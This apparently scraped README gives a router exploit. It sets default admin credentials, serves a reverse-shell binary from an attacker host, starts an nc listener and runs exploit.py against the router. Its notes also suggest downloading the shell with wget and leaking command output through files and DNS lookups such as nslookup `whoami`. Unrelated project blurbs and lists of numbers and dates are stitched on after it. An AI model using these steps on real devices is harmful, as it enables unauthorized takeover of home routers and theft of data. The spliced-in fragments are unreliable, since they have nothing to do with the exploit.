# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
Leads for leaking command output
Look for file paths that are displayed within the web interface that command output can be written to. Using /tmp/ping.log to view the output at /Ping.asp.
Use wget to download reverse shell binary to the router.
Config the attacker as the DNS server and force the router to issue DNS requests with the command output. Like nslookup `whoami`.fake.domain
TODOs
Use argparse and make the exploit an executable.
Unsolved Mysteries
If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?
Turtle π’ The only purpose of a byte-sized application is to help you create .desktop entry files for downloaded applications. As of usual with elemen
β οΈ The Nimbus infrastructure project is no longer under development. β οΈ For more information, please read the news announcement. If you are interested
The CS Netlogo Helper is a small python script I made, to make computer science homework easier. This project is really ironic now that I think about it.
59 May 11, 2022
14 Dec 29, 2022
5 Nov 21, 2022
133 Nov 13, 2022
873 Dec 29, 2022
11 Dec 16, 2022
1 Jan 04, 2022
194 Jun 30, 2022
94 Dec 27, 2022
21 Jan 06, 2023
1 Nov 11, 2021
1 Jan 13, 2022
10 Jun 16, 2022
7 Feb 28, 2022
7 Dec 20, 2022
80 Dec 20, 2022
1 Jan 10, 2022
16 Dec 14, 2022
68 Nov 02, 2022
7 Feb 06, 2022